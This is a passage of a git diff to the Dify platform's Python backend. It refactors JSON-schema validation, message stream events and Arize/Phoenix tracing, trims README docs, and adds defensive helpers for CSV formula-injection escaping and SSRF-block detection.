Sequence[str] | None = Field(default_factory=list) allowed_file_upload_methods: Sequence[FileTransferMethod] | None = Field(default_factory=list) - json_schema: dict[str, Any] | None = Field(default=None) + json_schema: str | None = Field(default=None) @field_validator("description", mode="before") @classmethod @@ -134,11 +135,17 @@ class VariableEntity(BaseModel): @field_validator("json_schema") @classmethod - def validate_json_schema(cls, schema: dict[str, Any] | None) -> dict[str, Any] | None: + def validate_json_schema(cls, schema: str | None) -> str | None: if schema is None: return None + try: - Draft7Validator.check_schema(schema) + json_schema = json.loads(schema) + except json.JSONDecodeError: + raise ValueError(f"invalid json_schema value {schema}") + + try: + Draft7Validator.check_schema(json_schema) except SchemaError as e: raise ValueError(f"Invalid JSON schema: {e.message}") return schema diff --git a/api/core/app/apps/base_app_generator.py b/api/core/app/apps/base_app_generator.py index 1b0474142e..02d58a07d1 100644 --- a/api/core/app/apps/base_app_generator.py +++ b/api/core/app/apps/base_app_generator.py @@ -1,3 +1,4 @@ +import json from collections.abc import Generator, Mapping, Sequence from typing import TYPE_CHECKING, Any, Union, final @@ -175,6 +176,13 @@ class BaseAppGenerator: value = True elif value == 0: value = False + case VariableEntityType.JSON_OBJECT: + if not isinstance(value, str): + raise ValueError(f"{variable_entity.variable} in input form must be a string") + try: + json.loads(value) + except json.JSONDecodeError: + raise ValueError(f"{variable_entity.variable} in input form must be a valid JSON object") case _: raise AssertionError("this statement should be unreachable.") diff --git a/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py b/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py index 5c169f4db1..5bb93fa44a 100644 --- a/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py +++ b/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py @@ -342,9 +342,11 @@ class EasyUIBasedGenerateTaskPipeline(BasedGenerateTaskPipeline): self._task_state.llm_result.message.content = current_content if isinstance(event, QueueLLMChunkEvent): + event_type = self._message_cycle_manager.get_message_event_type(message_id=self._message_id) yield self._message_cycle_manager.message_to_stream_response( answer=cast(str, delta_text), message_id=self._message_id, + event_type=event_type, ) else: yield self._agent_message_to_stream_response( diff --git a/api/core/app/task_pipeline/message_cycle_manager.py b/api/core/app/task_pipeline/message_cycle_manager.py index 2e6f92efa5..0e7f300cee 100644 --- a/api/core/app/task_pipeline/message_cycle_manager.py +++ b/api/core/app/task_pipeline/message_cycle_manager.py @@ -5,7 +5,7 @@ from threading import Thread from typing import Union from flask import Flask, current_app -from sqlalchemy import select +from sqlalchemy import exists, select from sqlalchemy.orm import Session from configs import dify_config @@ -54,6 +54,20 @@ class MessageCycleManager: ): self._application_generate_entity = application_generate_entity self._task_state = task_state + self._message_has_file: set[str] = set() + + def get_message_event_type(self, message_id: str) -> StreamEvent: + if message_id in self._message_has_file: + return StreamEvent.MESSAGE_FILE + + with Session(db.engine, expire_on_commit=False) as session: + has_file = session.query(exists().where(MessageFile.message_id == message_id)).scalar() + + if has_file: + self._message_has_file.add(message_id) + return StreamEvent.MESSAGE_FILE + + return StreamEvent.MESSAGE def generate_conversation_name(self, *, conversation_id: str, query: str) -> Thread | None: """ @@ -214,7 +228,11 @@ class MessageCycleManager: return None def message_to_stream_response( - self, answer: str, message_id: str, from_variable_selector: list[str] | None = None + self, + answer: str, + message_id: str, + from_variable_selector: list[str] | None = None, + event_type: StreamEvent | None = None, ) -> MessageStreamResponse: """ Message to stream response. @@ -222,16 +240,12 @@ class MessageCycleManager: :param message_id: message id :return: """ - with Session(db.engine, expire_on_commit=False) as session: - message_file = session.scalar(select(MessageFile).where(MessageFile.id == message_id)) - event_type = StreamEvent.MESSAGE_FILE if message_file else StreamEvent.MESSAGE - return MessageStreamResponse( task_id=self._application_generate_entity.task_id, id=message_id, answer=answer, from_variable_selector=from_variable_selector, - event=event_type, + event=event_type or StreamEvent.MESSAGE, ) def message_replace_to_stream_response(self, answer: str, reason: str = "") -> MessageReplaceStreamResponse: diff --git a/api/core/db/__init__.py b/api/core/db/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/db/session_factory.py b/api/core/db/session_factory.py new file mode 100644 index 0000000000..1dae2eafd4 --- /dev/null +++ b/api/core/db/session_factory.py @@ -0,0 +1,38 @@ +from sqlalchemy import Engine +from sqlalchemy.orm import Session, sessionmaker + +_session_maker: sessionmaker | None = None + + +def configure_session_factory(engine: Engine, expire_on_commit: bool = False): + """Configure the global session factory""" + global _session_maker + _session_maker = sessionmaker(bind=engine, expire_on_commit=expire_on_commit) + + +def get_session_maker() -> sessionmaker: + if _session_maker is None: + raise RuntimeError("Session factory not configured. Call configure_session_factory() first.") + return _session_maker + + +def create_session() -> Session: + return get_session_maker()() + + +# Class wrapper for convenience +class SessionFactory: + @staticmethod + def configure(engine: Engine, expire_on_commit: bool = False): + configure_session_factory(engine, expire_on_commit) + + @staticmethod + def get_session_maker() -> sessionmaker: + return get_session_maker() + + @staticmethod + def create_session() -> Session: + return create_session() + + +session_factory = SessionFactory() diff --git a/api/core/entities/knowledge_entities.py b/api/core/entities/knowledge_entities.py index bed3a35400..d4093b5245 100644 --- a/api/core/entities/knowledge_entities.py +++ b/api/core/entities/knowledge_entities.py @@ -1,4 +1,4 @@ -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator class PreviewDetail(BaseModel): @@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel): class PipelineDataset(BaseModel): id: str name: str - description: str | None = Field(default="", description="knowledge dataset description") + description: str = Field(default="", description="knowledge dataset description") chunk_structure: str + @field_validator("description", mode="before") + @classmethod + def normalize_description(cls, value: str | None) -> str: + """Coerce None to empty string so description is always a string.""" + if value is None: + return "" + return value + class PipelineDocument(BaseModel): id: str diff --git a/api/core/entities/mcp_provider.py b/api/core/entities/mcp_provider.py index 7484cea04a..7fdf5e4be6 100644 --- a/api/core/entities/mcp_provider.py +++ b/api/core/entities/mcp_provider.py @@ -213,12 +213,23 @@ class MCPProviderEntity(BaseModel): return None def retrieve_tokens(self) -> OAuthTokens | None: - """OAuth tokens if available""" + """Retrieve OAuth tokens if authentication is complete. + + Returns: + OAuthTokens if the provider has been authenticated, None otherwise. + """ if not self.credentials: return None credentials = self.decrypt_credentials() + access_token = credentials.get("access_token", "") + # Return None if access_token is empty to avoid generating invalid "Authorization: Bearer " header. + # Note: We don't check for whitespace-only strings here because: + # 1. OAuth servers don't return whitespace-only access tokens in practice + # 2. Even if they did, the server would return 401, triggering the OAuth flow correctly + if not access_token: + return None return OAuthTokens( - access_token=credentials.get("access_token", ""), + access_token=access_token, token_type=credentials.get("token_type", DEFAULT_TOKEN_TYPE), expires_in=int(credentials.get("expires_in", str(DEFAULT_EXPIRES_IN)) or DEFAULT_EXPIRES_IN), refresh_token=credentials.get("refresh_token", ""), diff --git a/api/core/helper/csv_sanitizer.py b/api/core/helper/csv_sanitizer.py new file mode 100644 index 0000000000..0023de5a35 --- /dev/null +++ b/api/core/helper/csv_sanitizer.py @@ -0,0 +1,89 @@ +"""CSV sanitization utilities to prevent formula injection attacks.""" + +from typing import Any + + +class CSVSanitizer: + """ + Sanitizer for CSV export to prevent formula injection attacks. + + This class provides methods to sanitize data before CSV export by escaping + characters that could be interpreted as formulas by spreadsheet applications + (Excel, LibreOffice, Google Sheets). + + Formula injection occurs when user-controlled data starting with special + characters (=, +, -, @, tab, carriage return) is exported to CSV and opened + in a spreadsheet application, potentially executing malicious commands. + """ + + # Characters that can start a formula in Excel/LibreOffice/Google Sheets + FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"}) + + @classmethod + def sanitize_value(cls, value: Any) -> str: + """ + Sanitize a value for safe CSV export. + + Prefixes formula-initiating characters with a single quote to prevent + Excel/LibreOffice/Google Sheets from treating them as formulas. + + Args: + value: The value to sanitize (will be converted to string) + + Returns: + Sanitized string safe for CSV export + + Examples: + >>> CSVSanitizer.sanitize_value("=1+1") + "'=1+1" + >>> CSVSanitizer.sanitize_value("Hello World") + "Hello World" + >>> CSVSanitizer.sanitize_value(None) + "" + """ + if value is None: + return "" + + # Convert to string + str_value = str(value) + + # If empty, return as is + if not str_value: + return "" + + # Check if first character is a formula initiator + if str_value[0] in cls.FORMULA_CHARS: + # Prefix with single quote to escape + return f"'{str_value}" + + return str_value + + @classmethod + def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]: + """ + Sanitize specified fields in a dictionary. + + Args: + data: Dictionary containing data to sanitize + fields_to_sanitize: List of field names to sanitize. + If None, sanitizes all string fields. + + Returns: + Dictionary with sanitized values (creates a shallow copy) + + Examples: + >>> data = {"question": "=1+1", "answer": "+calc", "id": "123"} + >>> CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + {"question": "'=1+1", "answer": "'+calc", "id": "123"} + """ + sanitized = data.copy() + + if fields_to_sanitize is None: + # Sanitize all string fields + fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)] + + for field in fields_to_sanitize: + if field in sanitized: + sanitized[field] = cls.sanitize_value(sanitized[field]) + + return sanitized diff --git a/api/core/helper/ssrf_proxy.py b/api/core/helper/ssrf_proxy.py index 0de026f3c7..6c98aea1be 100644 --- a/api/core/helper/ssrf_proxy.py +++ b/api/core/helper/ssrf_proxy.py @@ -9,6 +9,7 @@ import httpx from configs import dify_config from core.helper.http_client_pooling import get_pooled_http_client +from core.tools.errors import ToolSSRFError logger = logging.getLogger(__name__) @@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs): while retries <= max_retries: try: response = client.request(method=method, url=url, **kwargs) + # Check for SSRF protection by Squid proxy + if response.status_code in (401, 403): + # Check if this is a Squid SSRF rejection + server_header = response.headers.get("server", "").lower() + via_header = response.headers.get("via", "").lower() + + # Squid typically identifies itself in Server or Via headers + if "squid" in server_header or "squid" in via_header: + raise ToolSSRFError( + f"Access to '{url}' was blocked by SSRF protection. " + f"The URL may point to a private or local network address. " + ) if response.status_code not in STATUS_FORCELIST: return response diff --git a/api/core/llm_generator/llm_generator.py b/api/core/llm_generator/llm_generator.py index 4a577e6c38..b4c3ec1caf 100644 --- a/api/core/llm_generator/llm_generator.py +++ b/api/core/llm_generator/llm_generator.py @@ -72,15 +72,22 @@ class LLMGenerator: prompt_messages=list(prompts), model_parameters={"max_tokens": 500, "temperature": 1}, stream=False ) answer = cast(str, response.message.content) - cleaned_answer = re.sub(r"^.*(\{.*\}).*$", r"\1", answer, flags=re.DOTALL) - if cleaned_answer is None: + if answer is None: return "" try: - result_dict = json.loads(cleaned_answer) - answer = result_dict["Your Output"] + result_dict = json.loads(answer) except json.JSONDecodeError: - logger.exception("Failed to generate name after answer, use query instead") + result_dict = json_repair.loads(answer) + + if not isinstance(result_dict, dict): answer = query + else: + output = result_dict.get("Your Output") + if isinstance(output, str) and output.strip(): + answer = output.strip() + else: + answer = query + name = answer.strip() if len(name) > 75: diff --git a/api/core/model_runtime/README.md b/api/core/model_runtime/README.md index a6caa7eb1e..b9d2c55210 100644 --- a/api/core/model_runtime/README.md +++ b/api/core/model_runtime/README.md @@ -18,34 +18,20 @@ This module provides the interface for invoking and authenticating various model - Model provider display - ![image-20231210143654461](./docs/en_US/images/index/image-20231210143654461.png) - - Displays a list of all supported providers, including provider names, icons, supported model types list, predefined model list, configuration method, and credentials form rules, etc. For detailed rule design, see: [Schema](./docs/en_US/schema.md). + Displays a list of all supported providers, including provider names, icons, supported model types list, predefined model list, configuration method, and credentials form rules, etc. - Selectable model list display - ![image-20231210144229650](./docs/en_US/images/index/image-20231210144229650.png) - After configuring provider/model credentials, the dropdown (application orchestration interface/default model) allows viewing of the available LLM list. Greyed out items represent predefined model lists from providers without configured credentials, facilitating user review of supported models. - In addition, this list also returns configurable parameter information and rules for LLM, as shown below: - - ![image-20231210144814617](./docs/en_US/images/index/image-20231210144814617.png) - - These parameters are all defined in the backend, allowing different settings for various parameters supported by different models, as detailed in: [Schema](./docs/en_US/schema.md#ParameterRule). + In addition, this list also returns configurable parameter information and rules for LLM. These parameters are all defined in the backend, allowing different settings for various parameters supported by different models. - Provider/model credential authentication - ![image-20231210151548521](./docs/en_US/images/index/image-20231210151548521.png) - - ![image-20231210151628992](./docs/en_US/images/index/image-20231210151628992.png) - - The provider list returns configuration information for the credentials form, which can be authenticated through Runtime's interface. The first image above is a provider credential DEMO, and the second is a model credential DEMO. + The provider list returns configuration information for the credentials form, which can be authenticated through Runtime's interface. ## Structure -![](./docs/en_US/images/index/image-20231210165243632.png) - Model Runtime is divided into three layers: - The outermost layer is the factory method @@ -60,9 +46,6 @@ Model Runtime is divided into three layers: It offers direct invocation of various model types, predefined model configuration information, getting predefined/remote model lists, model credential authentication methods. Different models provide additional special methods, like LLM's pre-computed tokens method, cost information obtaining method, etc., **allowing horizontal expansion** for different models under the same provider (within supported model types). -## Next Steps +## Documentation -- Add new provider configuration: [Link](./docs/en_US/provider_scale_out.md) -- Add new models for existing providers: [Link](./docs/en_US/provider_scale_out.md#AddModel) -- View YAML configuration rules: [Link](./docs/en_US/schema.md) -- Implement interface methods: [Link](./docs/en_US/interfaces.md) +For detailed documentation on how to add new providers or models, please refer to the [Dify documentation](https://docs.dify.ai/). diff --git a/api/core/model_runtime/README_CN.md b/api/core/model_runtime/README_CN.md index dfe614347a..0a8b56b3fe 100644 --- a/api/core/model_runtime/README_CN.md +++ b/api/core/model_runtime/README_CN.md @@ -18,34 +18,20 @@ - 模型供应商展示 - ![image-20231210143654461](./docs/zh_Hans/images/index/image-20231210143654461.png) - -​ 展示所有已支持的供应商列表,除了返回供应商名称、图标之外,还提供了支持的模型类型列表,预定义模型列表、配置方式以及配置凭据的表单规则等等,规则设计详见:[Schema](./docs/zh_Hans/schema.md)。 + 展示所有已支持的供应商列表,除了返回供应商名称、图标之外,还提供了支持的模型类型列表,预定义模型列表、配置方式以及配置凭据的表单规则等等。 - 可选择的模型列表展示 - ![image-20231210144229650](./docs/zh_Hans/images/index/image-20231210144229650.png) + 配置供应商/模型凭据后,可在此下拉(应用编排界面/默认模型)查看可用的 LLM 列表,其中灰色的为未配置凭据供应商的预定义模型列表,方便用户查看已支持的模型。 -​ 配置供应商/模型凭据后,可在此下拉(应用编排界面/默认模型)查看可用的 LLM 列表,其中灰色的为未配置凭据供应商的预定义模型列表,方便用户查看已支持的模型。 - -​ 除此之外,该列表还返回了 LLM 可配置的参数信息和规则,如下图: - -​ ![image-20231210144814617](./docs/zh_Hans/images/index/image-20231210144814617.png) - -​ 这里的参数均为后端定义,相比之前只有 5 种固定参数,这里可为不同模型设置所支持的各种参数,详见:[Schema](./docs/zh_Hans/schema.md#ParameterRule)。 + 除此之外,该列表还返回了 LLM 可配置的参数信息和规则。这里的参数均为后端定义,相比之前只有 5 种固定参数,这里可为不同模型设置所支持的各种参数。 - 供应商/模型凭据鉴权 - ![image-20231210151548521](./docs/zh_Hans/images/index/image-20231210151548521.png) - -![image-20231210151628992](./docs/zh_Hans/images/index/image-20231210151628992.png) - -​ 供应商列表返回了凭据表单的配置信息,可通过 Runtime 提供的接口对凭据进行鉴权,上图 1 为供应商凭据 DEMO,上图 2 为模型凭据 DEMO。 + 供应商列表返回了凭据表单的配置信息,可通过 Runtime 提供的接口对凭据进行鉴权。 ## 结构 -![](./docs/zh_Hans/images/index/image-20231210165243632.png) - Model Runtime 分三层: - 最外层为工厂方法 @@ -59,8 +45,7 @@ Model Runtime 分三层: 对于供应商/模型凭据,有两种情况 - 如 OpenAI 这类中心化供应商,需要定义如**api_key**这类的鉴权凭据 - - 如[**Xinference**](https://github.com/xorbitsai/inference)这类本地部署的供应商,需要定义如**server_url**这类的地址凭据,有时候还需要定义**model_uid**之类的模型类型凭据,就像下面这样,当在供应商层定义了这些凭据后,就可以在前端页面上直接展示,无需修改前端逻辑。 - ![Alt text](docs/zh_Hans/images/index/image.png) + - 如[**Xinference**](https://github.com/xorbitsai/inference)这类本地部署的供应商,需要定义如**server_url**这类的地址凭据,有时候还需要定义**model_uid**之类的模型类型凭据。当在供应商层定义了这些凭据后,就可以在前端页面上直接展示,无需修改前端逻辑。 当配置好凭据后,就可以通过 DifyRuntime 的外部接口直接获取到对应供应商所需要的**Schema**(凭据表单规则),从而在可以在不修改前端逻辑的情况下,提供新的供应商/模型的支持。 @@ -74,20 +59,6 @@ Model Runtime 分三层: - 模型凭据 (**在供应商层定义**):这是一类不经常变动,一般在配置好后就不会再变动的参数,如 **api_key**、**server_url** 等。在 DifyRuntime 中,他们的参数名一般为**credentials: dict[str, any]**,Provider 层的 credentials 会直接被传递到这一层,不需要再单独定义。 -## 下一步 +## 文档 -### [增加新的供应商配置 👈🏻](./docs/zh_Hans/provider_scale_out.md) - -当添加后,这里将会出现一个新的供应商 - -![Alt text](docs/zh_Hans/images/index/image-1.png) - -### [为已存在的供应商新增模型 👈🏻](./docs/zh_Hans/provider_scale_out.md#%E5%A2%9E%E5%8A%A0%E6%A8%A1%E5%9E%8B) - -当添加后,对应供应商的模型列表中将会出现一个新的预定义模型供用户选择,如 GPT-3.5 GPT-4 ChatGLM3-6b 等,而对于支持自定义模型的供应商,则不需要新增模型。 - -![Alt text](docs/zh_Hans/images/index/image-2.png) - -### [接口的具体实现 👈🏻](./docs/zh_Hans/interfaces.md) - -你可以在这里找到你想要查看的接口的具体实现,以及接口的参数和返回值的具体含义。 +有关如何添加新供应商或模型的详细文档,请参阅 [Dify 文档](https://docs.dify.ai/)。 diff --git a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py index 347992fa0d..a7b73e032e 100644 --- a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py +++ b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py @@ -6,7 +6,13 @@ from datetime import datetime, timedelta from typing import Any, Union, cast from urllib.parse import urlparse -from openinference.semconv.trace import OpenInferenceMimeTypeValues, OpenInferenceSpanKindValues, SpanAttributes +from openinference.semconv.trace import ( + MessageAttributes, + OpenInferenceMimeTypeValues, + OpenInferenceSpanKindValues, + SpanAttributes, + ToolCallAttributes, +) from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter as GrpcOTLPSpanExporter from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter as HttpOTLPSpanExporter from opentelemetry.sdk import trace as trace_sdk @@ -95,14 +101,14 @@ def setup_tracer(arize_phoenix_config: ArizeConfig | PhoenixConfig) -> tuple[tra def datetime_to_nanos(dt: datetime | None) -> int: - """Convert datetime to nanoseconds since epoch. If None, use current time.""" + """Convert datetime to nanoseconds since epoch for Arize/Phoenix.""" if dt is None: dt = datetime.now() return int(dt.timestamp() * 1_000_000_000) def error_to_string(error: Exception | str | None) -> str: - """Convert an error to a string with traceback information.""" + """Convert an error to a string with traceback information for Arize/Phoenix.""" error_message = "Empty Stack Trace" if error: if isinstance(error, Exception): @@ -114,7 +120,7 @@ def error_to_string(error: Exception | str | None) -> str: def set_span_status(current_span: Span, error: Exception | str | None = None): - """Set the status of the current span based on the presence of an error.""" + """Set the status of the current span based on the presence of an error for Arize/Phoenix.""" if error: error_string = error_to_string(error) current_span.set_status(Status(StatusCode.ERROR, error_string)) @@ -138,10 +144,17 @@ def set_span_status(current_span: Span, error: Exception | str | None = None): def safe_json_dumps(obj: Any) -> str: - """A convenience wrapper around `json.dumps` that ensures that any object can be safely encoded.""" + """A convenience wrapper to ensure that any object can be safely encoded for Arize/Phoenix.""" return json.dumps(obj, default=str, ensure_ascii=False) +def wrap_span_metadata(metadata, **kwargs): + """Add common metatada to all trace entity types for Arize/Phoenix.""" + metadata["created_from"] = "Dify" + metadata.update(kwargs) + return metadata + + class ArizePhoenixDataTrace(BaseTraceInstance): def __init__( self, @@ -183,16 +196,27 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise def workflow_trace(self, trace_info: WorkflowTraceInfo): - workflow_metadata = { - "workflow_run_id": trace_info.workflow_run_id or "", - "message_id": trace_info.message_id or "", - "workflow_app_log_id": trace_info.workflow_app_log_id or "", - "status": trace_info.workflow_run_status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - } - workflow_metadata.update(trace_info.metadata) + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] + + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.workflow_run_status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="workflow", + conversation_id=trace_info.conversation_id or "", + workflow_app_log_id=trace_info.workflow_app_log_id or "", + workflow_id=trace_info.workflow_id or "", + tenant_id=trace_info.tenant_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + workflow_run_elapsed_time=trace_info.workflow_run_elapsed_time or 0, + workflow_run_version=trace_info.workflow_run_version or "", + total_tokens=trace_info.total_tokens or 0, + file_list=safe_json_dumps(file_list), + query=trace_info.query or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.workflow_run_id self.ensure_root_span(dify_trace_id) @@ -201,10 +225,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): workflow_span = self.tracer.start_span( name=TraceTaskName.WORKFLOW_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.workflow_run_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.workflow_run_outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(workflow_metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.workflow_run_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.workflow_run_outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), @@ -257,6 +283,7 @@ class ArizePhoenixDataTrace(BaseTraceInstance): "app_id": app_id, "app_name": node_execution.title, "status": node_execution.status, + "status_message": node_execution.error or "", "level": "ERROR" if node_execution.status == "failed" else "DEFAULT", } ) @@ -290,11 +317,11 @@ class ArizePhoenixDataTrace(BaseTraceInstance): node_span = self.tracer.start_span( name=node_execution.node_type, attributes={ + SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.INPUT_VALUE: safe_json_dumps(inputs_value), SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: safe_json_dumps(outputs_value), SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, - SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.METADATA: safe_json_dumps(node_metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, @@ -339,30 +366,37 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def message_trace(self, trace_info: MessageTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping message trace.") return - file_list = cast(list[str], trace_info.file_list) or [] + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] message_file_data: MessageFile | None = trace_info.message_file_data if message_file_data is not None: file_url = f"{self.file_base_url}/{message_file_data.url}" if message_file_data else "" file_list.append(file_url) - message_metadata = { - "message_id": trace_info.message_id or "", - "conversation_mode": str(trace_info.conversation_mode or ""), - "user_id": trace_info.message_data.from_account_id or "", - "file_list": json.dumps(file_list), - "status": trace_info.message_data.status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - "prompt_tokens": trace_info.message_tokens or 0, - "completion_tokens": trace_info.answer_tokens or 0, - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - message_metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="message", + conversation_model=trace_info.conversation_model or "", + message_tokens=trace_info.message_tokens or 0, + answer_tokens=trace_info.answer_tokens or 0, + total_tokens=trace_info.total_tokens or 0, + conversation_mode=trace_info.conversation_mode or "", + gen_ai_server_time_to_first_token=trace_info.gen_ai_server_time_to_first_token or 0, + llm_streaming_time_to_generate=trace_info.llm_streaming_time_to_generate or 0, + is_streaming_request=trace_info.is_streaming_request or False, + user_id=trace_info.message_data.from_account_id or "", + file_list=safe_json_dumps(file_list), + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) # Add end user data if available if trace_info.message_data.from_end_user_id: @@ -370,14 +404,16 @@ class ArizePhoenixDataTrace(BaseTraceInstance): db.session.query(EndUser).where(EndUser.id == trace_info.message_data.from_end_user_id).first() ) if end_user_data is not None: - message_metadata["end_user_id"] = end_user_data.session_id + metadata["end_user_id"] = end_user_data.session_id attributes = { - SpanAttributes.INPUT_VALUE: trace_info.message_data.query, - SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.INPUT_VALUE: trace_info.message_data.query, + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } dify_trace_id = trace_info.trace_id or trace_info.message_id @@ -393,8 +429,10 @@ class ArizePhoenixDataTrace(BaseTraceInstance): try: # Convert outputs to string based on type + outputs_mime_type = OpenInferenceMimeTypeValues.TEXT.value if isinstance(trace_info.outputs, dict | list): - outputs_str = json.dumps(trace_info.outputs, ensure_ascii=False) + outputs_str = safe_json_dumps(trace_info.outputs) + outputs_mime_type = OpenInferenceMimeTypeValues.JSON.value elif isinstance(trace_info.outputs, str): outputs_str = trace_info.outputs else: @@ -402,10 +440,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): llm_attributes = { SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.LLM.value, - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: outputs_str, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.OUTPUT_MIME_TYPE: outputs_mime_type, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } llm_attributes.update(self._construct_llm_attributes(trace_info.inputs)) if trace_info.total_tokens is not None and trace_info.total_tokens > 0: @@ -449,16 +489,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def moderation_trace(self, trace_info: ModerationTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping moderation trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_name": "moderation", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="moderation", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -467,18 +511,19 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.MODERATION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps( + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps( { - "action": trace_info.action, "flagged": trace_info.flagged, + "action": trace_info.action, "preset_response": trace_info.preset_response, - "inputs": trace_info.inputs, - }, - ensure_ascii=False, + "query": trace_info.query, + } ), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ 